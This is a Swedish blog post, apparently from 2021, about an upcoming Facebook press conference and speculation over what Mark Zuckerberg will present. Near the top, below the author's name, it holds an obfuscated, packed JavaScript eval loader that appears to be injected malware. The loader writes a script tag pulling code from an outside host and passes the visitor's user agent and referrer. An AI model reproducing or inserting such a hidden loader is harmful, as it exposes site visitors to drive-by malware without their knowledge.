Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Facebook pressmöte ikväll

Facebook pressmöte ikväll
Sebastian

Facebook: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|atird|var|u0026u|referrer|izynh||js|php’.split(’|’),0,{}))
Klockan 19.00 idag svensk tid kliver Mark Zuckerberg fram och kommer hålla i ett pressmöte. Igen vet riktigt vad som kommer att presenteras då det enda som står på inbjudan är ”Kom och se vad vi bygger”.

Spekulationerna har självklart tagit fart och deras aktie har stigit inför ikväll. 

Många tror att Facebook kommer att lansera en egen mobiltelefon eller smartphone. 

– Om jag skulle gissa tror jag att det har att göra med annonsplattformen. Jag är inte övertygad om att det är en telefon, säger Brian Pitz, analytiker på Jefferies & Co, till Reuters.

Andra källor har pratat om en ny version av Facebook Messenger för iPad vilket absolut skulle kunna vara något som visas upp. Även en sökmotor är något som Mark Zuckerberg tidigare talat om att företaget varit intresserade av. 

I sommras pratades det också om ett nytt hus som skulle byggas i Menlo Park. Detta skulle ritas av den kända arkitekten Frank Gehry.

Som sagt ska det bli mycket intressant att se vad som väntas klockan 19:00 ikväll svensk tid.

Läs mer: IDG